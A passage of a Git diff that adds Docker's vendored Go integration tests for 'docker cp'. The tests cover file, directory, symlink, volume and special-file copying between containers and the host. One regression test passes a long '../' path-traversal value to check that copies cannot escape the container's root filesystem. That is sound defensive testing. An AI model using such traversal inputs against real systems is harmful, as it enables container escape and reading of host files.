+// B. SRC specifies a file and DST (with trailing path separator) doesn't
+//    exist. This should cause an error because the copy operation cannot
+//    create a directory when copying a single file.
+func (s *DockerSuite) TestCpFromCaseB(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-b")
+	defer os.RemoveAll(tmpDir)
+
+	srcPath := containerCpPath(containerID, "/file1")
+	dstDir := cpPathTrailingSep(tmpDir, "testDir")
+
+	err := runDockerCp(c, srcPath, dstDir)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err))
+}
+
+// C. SRC specifies a file and DST exists as a file. This should overwrite
+//    the file at DST with the contents of the source file.
+func (s *DockerSuite) TestCpFromCaseC(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-c")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := containerCpPath(containerID, "/root/file1")
+	dstPath := cpPath(tmpDir, "file2")
+
+	// Ensure the local file starts with different content.
+	c.Assert(fileContentEquals(c, dstPath, "file2\n"), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
+}
+
+// D. SRC specifies a file and DST exists as a directory. This should place
+//    a copy of the source file inside it using the basename from SRC. Ensure
+//    this works whether DST has a trailing path separator or not.
+func (s *DockerSuite) TestCpFromCaseD(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-d")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := containerCpPath(containerID, "/file1")
+	dstDir := cpPath(tmpDir, "dir1")
+	dstPath := filepath.Join(dstDir, "file1")
+
+	// Ensure that dstPath doesn't exist.
+	_, err := os.Stat(dstPath)
+	c.Assert(os.IsNotExist(err), checker.True, check.Commentf("did not expect dstPath %q to exist", dstPath))
+
+	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// unable to remove dstDir
+	c.Assert(os.RemoveAll(dstDir), checker.IsNil)
+
+	// unable to make dstDir
+	c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil)
+
+	dstDir = cpPathTrailingSep(tmpDir, "dir1")
+
+	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
+}
+
+// E. SRC specifies a directory and DST does not exist. This should create a
+//    directory at DST and copy the contents of the SRC directory into the DST
+//    directory. Ensure this works whether DST has a trailing path separator or
+//    not.
+func (s *DockerSuite) TestCpFromCaseE(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-e")
+	defer os.RemoveAll(tmpDir)
+
+	srcDir := containerCpPath(containerID, "dir1")
+	dstDir := cpPath(tmpDir, "testDir")
+	dstPath := filepath.Join(dstDir, "file1-1")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// unable to remove dstDir
+	c.Assert(os.RemoveAll(dstDir), checker.IsNil)
+
+	dstDir = cpPathTrailingSep(tmpDir, "testDir")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+}
+
+// F. SRC specifies a directory and DST exists as a file. This should cause an
+//    error as it is not possible to overwrite a file with a directory.
+func (s *DockerSuite) TestCpFromCaseF(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-f")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := containerCpPath(containerID, "/root/dir1")
+	dstFile := cpPath(tmpDir, "file1")
+
+	err := runDockerCp(c, srcDir, dstFile)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
+}
+
+// G. SRC specifies a directory and DST exists as a directory. This should copy
+//    the SRC directory and all its contents to the DST directory. Ensure this
+//    works whether DST has a trailing path separator or not.
+func (s *DockerSuite) TestCpFromCaseG(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-g")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := containerCpPath(containerID, "/root/dir1")
+	dstDir := cpPath(tmpDir, "dir2")
+	resultDir := filepath.Join(dstDir, "dir1")
+	dstPath := filepath.Join(resultDir, "file1-1")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// unable to remove dstDir
+	c.Assert(os.RemoveAll(dstDir), checker.IsNil)
+
+	// unable to make dstDir
+	c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil)
+
+	dstDir = cpPathTrailingSep(tmpDir, "dir2")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+}
+
+// H. SRC specifies a directory's contents only and DST does not exist. This
+//    should create a directory at DST and copy the contents of the SRC
+//    directory (but not the directory itself) into the DST directory. Ensure
+//    this works whether DST has a trailing path separator or not.
+func (s *DockerSuite) TestCpFromCaseH(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-h")
+	defer os.RemoveAll(tmpDir)
+
+	srcDir := containerCpPathTrailingSep(containerID, "dir1") + "."
+	dstDir := cpPath(tmpDir, "testDir")
+	dstPath := filepath.Join(dstDir, "file1-1")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// unable to remove resultDir
+	c.Assert(os.RemoveAll(dstDir), checker.IsNil)
+
+	dstDir = cpPathTrailingSep(tmpDir, "testDir")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+}
+
+// I. SRC specifies a directory's contents only and DST exists as a file. This
+//    should cause an error as it is not possible to overwrite a file with a
+//    directory.
+func (s *DockerSuite) TestCpFromCaseI(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-i")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "."
+	dstFile := cpPath(tmpDir, "file1")
+
+	err := runDockerCp(c, srcDir, dstFile)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
+}
+
+// J. SRC specifies a directory's contents only and DST exists as a directory.
+//    This should copy the contents of the SRC directory (but not the directory
+//    itself) into the DST directory. Ensure this works whether DST has a
+//    trailing path separator or not.
+func (s *DockerSuite) TestCpFromCaseJ(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-j")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "."
+	dstDir := cpPath(tmpDir, "dir2")
+	dstPath := filepath.Join(dstDir, "file1-1")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// unable to remove dstDir
+	c.Assert(os.RemoveAll(dstDir), checker.IsNil)
+
+	// unable to make dstDir
+	c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil)
+
+	dstDir = cpPathTrailingSep(tmpDir, "dir2")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go
new file mode 100644
index 0000000000..4e5c39e998
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go
@@ -0,0 +1,660 @@
+package main
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+const (
+	cpTestPathParent = "/some"
+	cpTestPath       = "/some/path"
+	cpTestName       = "test"
+	cpFullPath       = "/some/path/test"
+
+	cpContainerContents = "holla, i am the container"
+	cpHostContents      = "hello, i am the host"
+)
+
+// Ensure that an all-local path case returns an error.
+func (s *DockerSuite) TestCpLocalOnly(c *check.C) {
+	err := runDockerCp(c, "foo", "bar")
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(err.Error(), checker.Contains, "must specify at least one container source")
+}
+
+// Test for #5656
+// Check that garbage paths don't escape the container's rootfs
+func (s *DockerSuite) TestCpGarbagePath(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath)
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil)
+
+	hostFile, err := os.Create(cpFullPath)
+	c.Assert(err, checker.IsNil)
+	defer hostFile.Close()
+	defer os.RemoveAll(cpTestPathParent)
+
+	fmt.Fprintf(hostFile, "%s", cpHostContents)
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+
+	tmpname := filepath.Join(tmpdir, cpTestName)
+	defer os.RemoveAll(tmpdir)
+
+	path := path.Join("../../../../../../../../../../../../", cpFullPath)
+
+	dockerCmd(c, "cp", containerID+":"+path, tmpdir)
+
+	file, _ := os.Open(tmpname)
+	defer file.Close()
+
+	test, err := ioutil.ReadAll(file)
+	c.Assert(err, checker.IsNil)
+
+	// output matched host file -- garbage path can escape container rootfs
+	c.Assert(string(test), checker.Not(checker.Equals), cpHostContents)
+
+	// output doesn't match the input for garbage path
+	c.Assert(string(test), checker.Equals, cpContainerContents)
+}
+
+// Check that relative paths are relative to the container's rootfs
+func (s *DockerSuite) TestCpRelativePath(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath)
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil)
+
+	hostFile, err := os.Create(cpFullPath)
+	c.Assert(err, checker.IsNil)
+	defer hostFile.Close()
+	defer os.RemoveAll(cpTestPathParent)
+
+	fmt.Fprintf(hostFile, "%s", cpHostContents)
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+
+	tmpname := filepath.Join(tmpdir, cpTestName)
+	defer os.RemoveAll(tmpdir)
+
+	var relPath string
+	if path.IsAbs(cpFullPath) {
+		// normally this is `filepath.Rel("/", cpFullPath)` but we cannot
+		// get this unix-path manipulation on windows with filepath.
+		relPath = cpFullPath[1:]
+	}
+	c.Assert(path.IsAbs(cpFullPath), checker.True, check.Commentf("path %s was assumed to be an absolute path", cpFullPath))
+
+	dockerCmd(c, "cp", containerID+":"+relPath, tmpdir)
+
+	file, _ := os.Open(tmpname)
+	defer file.Close()
+
+	test, err := ioutil.ReadAll(file)
+	c.Assert(err, checker.IsNil)
+
+	// output matched host file -- relative path can escape container rootfs
+	c.Assert(string(test), checker.Not(checker.Equals), cpHostContents)
+
+	// output doesn't match the input for relative path
+	c.Assert(string(test), checker.Equals, cpContainerContents)
+}
+
+// Check that absolute paths are relative to the container's rootfs
+func (s *DockerSuite) TestCpAbsolutePath(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath)
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil)
+
+	hostFile, err := os.Create(cpFullPath)
+	c.Assert(err, checker.IsNil)
+	defer hostFile.Close()
+	defer os.RemoveAll(cpTestPathParent)
+
+	fmt.Fprintf(hostFile, "%s", cpHostContents)
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+
+	tmpname := filepath.Join(tmpdir, cpTestName)
+	defer os.RemoveAll(tmpdir)
+
+	path := cpFullPath
+
+	dockerCmd(c, "cp", containerID+":"+path, tmpdir)
+
+	file, _ := os.Open(tmpname)
+	defer file.Close()
+
+	test, err := ioutil.ReadAll(file)
+	c.Assert(err, checker.IsNil)
+
+	// output matched host file -- absolute path can escape container rootfs
+	c.Assert(string(test), checker.Not(checker.Equals), cpHostContents)
+
+	// output doesn't match the input for absolute path
+	c.Assert(string(test), checker.Equals, cpContainerContents)
+}
+
+// Test for #5619
+// Check that absolute symlinks are still relative to the container's rootfs
+func (s *DockerSuite) TestCpAbsoluteSymlink(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpFullPath+" container_path")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil)
+
+	hostFile, err := os.Create(cpFullPath)
+	c.Assert(err, checker.IsNil)
+	defer hostFile.Close()
+	defer os.RemoveAll(cpTestPathParent)
+
+	fmt.Fprintf(hostFile, "%s", cpHostContents)
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+
+	tmpname := filepath.Join(tmpdir, "container_path")
+	defer os.RemoveAll(tmpdir)
+
+	path := path.Join("/", "container_path")
+
+	dockerCmd(c, "cp", containerID+":"+path, tmpdir)
+
+	// We should have copied a symlink *NOT* the file itself!
+	linkTarget, err := os.Readlink(tmpname)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(linkTarget, checker.Equals, filepath.FromSlash(cpFullPath))
+}
+
+// Check that symlinks to a directory behave as expected when copying one from
+// a container.
+func (s *DockerSuite) TestCpFromSymlinkToDirectory(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpTestPathParent+" /dir_link")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	testDir, err := ioutil.TempDir("", "test-cp-from-symlink-to-dir-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(testDir)
+
+	// This copy command should copy the symlink, not the target, into the
+	// temporary directory.
+	dockerCmd(c, "cp", containerID+":"+"/dir_link", testDir)
+
+	expectedPath := filepath.Join(testDir, "dir_link")
+	linkTarget, err := os.Readlink(expectedPath)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(linkTarget, checker.Equals, filepath.FromSlash(cpTestPathParent))
+
+	os.Remove(expectedPath)
+
+	// This copy command should resolve the symlink (note the trailing
+	// separator), copying the target into the temporary directory.
+	dockerCmd(c, "cp", containerID+":"+"/dir_link/", testDir)
+
+	// It *should not* have copied the directory using the target's name, but
+	// used the given name instead.
+	unexpectedPath := filepath.Join(testDir, cpTestPathParent)
+	stat, err := os.Lstat(unexpectedPath)
+	if err == nil {
+		out = fmt.Sprintf("target name was copied: %q - %q", stat.Mode(), stat.Name())
+	}
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+
+	// It *should* have copied the directory using the asked name "dir_link".
+	stat, err = os.Lstat(expectedPath)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to stat resource at %q", expectedPath))
+
+	c.Assert(stat.IsDir(), checker.True, check.Commentf("should have copied a directory but got %q instead", stat.Mode()))
+}
+
+// Check that symlinks to a directory behave as expected when copying one to a
+// container.
+func (s *DockerSuite) TestCpToSymlinkToDirectory(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon) // Requires local volume mount bind.
+
+	testVol, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(testVol)
+
+	// Create a test container with a local volume. We will test by copying
+	// to the volume path in the container which we can then verify locally.
+	out, _ := dockerCmd(c, "create", "-v", testVol+":/testVol", "busybox")
+
+	containerID := strings.TrimSpace(out)
+
+	// Create a temp directory to hold a test file nested in a directory.
+	testDir, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(testDir)
+
+	// This file will be at "/testDir/some/path/test" and will be copied into
+	// the test volume later.
+	hostTestFilename := filepath.Join(testDir, cpFullPath)
+	c.Assert(os.MkdirAll(filepath.Dir(hostTestFilename), os.FileMode(0700)), checker.IsNil)
+	c.Assert(ioutil.WriteFile(hostTestFilename, []byte(cpHostContents), os.FileMode(0600)), checker.IsNil)
+
+	// Now create another temp directory to hold a symlink to the
+	// "/testDir/some" directory.
+	linkDir, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(linkDir)
+
+	// Then symlink "/linkDir/dir_link" to "/testdir/some".
+	linkTarget := filepath.Join(testDir, cpTestPathParent)
+	localLink := filepath.Join(linkDir, "dir_link")
+	c.Assert(os.Symlink(linkTarget, localLink), checker.IsNil)
+
+	// Now copy that symlink into the test volume in the container.
+	dockerCmd(c, "cp", localLink, containerID+":/testVol")
+
+	// This copy command should have copied the symlink *not* the target.
+	expectedPath := filepath.Join(testVol, "dir_link")
+	actualLinkTarget, err := os.Readlink(expectedPath)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to read symlink at %q", expectedPath))
+
+	c.Assert(actualLinkTarget, checker.Equals, linkTarget)
+
+	// Good, now remove that copied link for the next test.
+	os.Remove(expectedPath)
+
+	// This copy command should resolve the symlink (note the trailing
+	// separator), copying the target into the test volume directory in the
+	// container.
+	dockerCmd(c, "cp", localLink+"/", containerID+":/testVol")
+
+	// It *should not* have copied the directory using the target's name, but
+	// used the given name instead.
+	unexpectedPath := filepath.Join(testVol, cpTestPathParent)
+	stat, err := os.Lstat(unexpectedPath)
+	if err == nil {
+		out = fmt.Sprintf("target name was copied: %q - %q", stat.Mode(), stat.Name())
+	}
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+
+	// It *should* have copied the directory using the asked name "dir_link".
+	stat, err = os.Lstat(expectedPath)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to stat resource at %q", expectedPath))
+
+	c.Assert(stat.IsDir(), checker.True, check.Commentf("should have copied a directory but got %q instead", stat.Mode()))
+
+	// And this directory should contain the file copied from the host at the
+	// expected location: "/testVol/dir_link/path/test"
+	expectedFilepath := filepath.Join(testVol, "dir_link/path/test")
+	fileContents, err := ioutil.ReadFile(expectedFilepath)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(string(fileContents), checker.Equals, cpHostContents)
+}
+
+// Test for #5619
+// Check that symlinks which are part of the resource path are still relative to the container's rootfs
+func (s *DockerSuite) TestCpSymlinkComponent(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpTestPath+" container_path")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil)
+
+	hostFile, err := os.Create(cpFullPath)
+	c.Assert(err, checker.IsNil)
+	defer hostFile.Close()
+	defer os.RemoveAll(cpTestPathParent)
+
+	fmt.Fprintf(hostFile, "%s", cpHostContents)
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+
+	c.Assert(err, checker.IsNil)
+
+	tmpname := filepath.Join(tmpdir, cpTestName)
+	defer os.RemoveAll(tmpdir)
+
+	path := path.Join("/", "container_path", cpTestName)
+
+	dockerCmd(c, "cp", containerID+":"+path, tmpdir)
+
+	file, _ := os.Open(tmpname)
+	defer file.Close()
+
+	test, err := ioutil.ReadAll(file)
+	c.Assert(err, checker.IsNil)
+
+	// output matched host file -- symlink path component can escape container rootfs
+	c.Assert(string(test), checker.Not(checker.Equals), cpHostContents)
+
+	// output doesn't match the input for symlink path component
+	c.Assert(string(test), checker.Equals, cpContainerContents)
+}
+
+// Check that cp with unprivileged user doesn't return any error
+func (s *DockerSuite) TestCpUnprivilegedUser(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, UnixCli) // uses chmod/su: not available on windows
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch "+cpTestName)
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+
+	defer os.RemoveAll(tmpdir)
+
+	c.Assert(os.Chmod(tmpdir, 0777), checker.IsNil)
+
+	result := icmd.RunCommand("su", "unprivilegeduser", "-c",
+		fmt.Sprintf("%s cp %s:%s %s", dockerBinary, containerID, cpTestName, tmpdir))
+	result.Assert(c, icmd.Expected{})
+}
+
+func (s *DockerSuite) TestCpSpecialFiles(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon)
+
+	outDir, err := ioutil.TempDir("", "cp-test-special-files")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(outDir)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch /foo")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	// Copy actual /etc/resolv.conf
+	dockerCmd(c, "cp", containerID+":/etc/resolv.conf", outDir)
+
+	expected, err := readContainerFile(containerID, "resolv.conf")
+	actual, err := ioutil.ReadFile(outDir + "/resolv.conf")
+
+	// Expected copied file to be duplicate of the container resolvconf
+	c.Assert(bytes.Equal(actual, expected), checker.True)
+
+	// Copy actual /etc/hosts
+	dockerCmd(c, "cp", containerID+":/etc/hosts", outDir)
+
+	expected, err = readContainerFile(containerID, "hosts")
+	actual, err = ioutil.ReadFile(outDir + "/hosts")
+
+	// Expected copied file to be duplicate of the container hosts
+	c.Assert(bytes.Equal(actual, expected), checker.True)
+
+	// Copy actual /etc/resolv.conf
+	dockerCmd(c, "cp", containerID+":/etc/hostname", outDir)
+
+	expected, err = readContainerFile(containerID, "hostname")
+	actual, err = ioutil.ReadFile(outDir + "/hostname")
+
+	// Expected copied file to be duplicate of the container resolvconf
+	c.Assert(bytes.Equal(actual, expected), checker.True)
+}
+
+func (s *DockerSuite) TestCpVolumePath(c *check.C) {
+	//  stat /tmp/cp-test-volumepath851508420/test gets permission denied for the user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon)
+
+	tmpDir, err := ioutil.TempDir("", "cp-test-volumepath")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+	outDir, err := ioutil.TempDir("", "cp-test-volumepath-out")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(outDir)
+	_, err = os.Create(tmpDir + "/test")
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "run", "-d", "-v", "/foo", "-v", tmpDir+"/test:/test", "-v", tmpDir+":/baz", "busybox", "/bin/sh", "-c", "touch /foo/bar")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	// Copy actual volume path
+	dockerCmd(c, "cp", containerID+":/foo", outDir)
+
+	stat, err := os.Stat(outDir + "/foo")
+	c.Assert(err, checker.IsNil)
+	// expected copied content to be dir
+	c.Assert(stat.IsDir(), checker.True)
+	stat, err = os.Stat(outDir + "/foo/bar")
+	c.Assert(err, checker.IsNil)
+	// Expected file `bar` to be a file
+	c.Assert(stat.IsDir(), checker.False)
+
+	// Copy file nested in volume
+	dockerCmd(c, "cp", containerID+":/foo/bar", outDir)
+
+	stat, err = os.Stat(outDir + "/bar")
+	c.Assert(err, checker.IsNil)
+	// Expected file `bar` to be a file
+	c.Assert(stat.IsDir(), checker.False)
+
+	// Copy Bind-mounted dir
+	dockerCmd(c, "cp", containerID+":/baz", outDir)
+	stat, err = os.Stat(outDir + "/baz")
+	c.Assert(err, checker.IsNil)
+	// Expected `baz` to be a dir
+	c.Assert(stat.IsDir(), checker.True)
+
+	// Copy file nested in bind-mounted dir
+	dockerCmd(c, "cp", containerID+":/baz/test", outDir)
+	fb, err := ioutil.ReadFile(outDir + "/baz/test")
+	c.Assert(err, checker.IsNil)
+	fb2, err := ioutil.ReadFile(tmpDir + "/test")
+	c.Assert(err, checker.IsNil)
+	// Expected copied file to be duplicate of bind-mounted file
+	c.Assert(bytes.Equal(fb, fb2), checker.True)
+
+	// Copy bind-mounted file
+	dockerCmd(c, "cp", containerID+":/test", outDir)
+	fb, err = ioutil.ReadFile(outDir + "/test")
+	c.Assert(err, checker.IsNil)
+	fb2, err = ioutil.ReadFile(tmpDir + "/test")
+	c.Assert(err, checker.IsNil)
+	// Expected copied file to be duplicate of bind-mounted file
+	c.Assert(bytes.Equal(fb, fb2), checker.True)
+}
+
+func (s *DockerSuite) TestCpToDot(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /test")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpdir)
+	cwd, err := os.Getwd()
+	c.Assert(err, checker.IsNil)
+	defer os.Chdir(cwd)
+	c.Assert(os.Chdir(tmpdir), checker.IsNil)
+	dockerCmd(c, "cp", containerID+":/test", ".")
+	content, err := ioutil.ReadFile("./test")
+	c.Assert(string(content), checker.Equals, "lololol\n")
+}
+
+func (s *DockerSuite) TestCpToStdout(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /test")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "cp", containerID+":/test", "-"),
+		exec.Command("tar", "-vtf", "-"))
+
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(out, checker.Contains, "test")
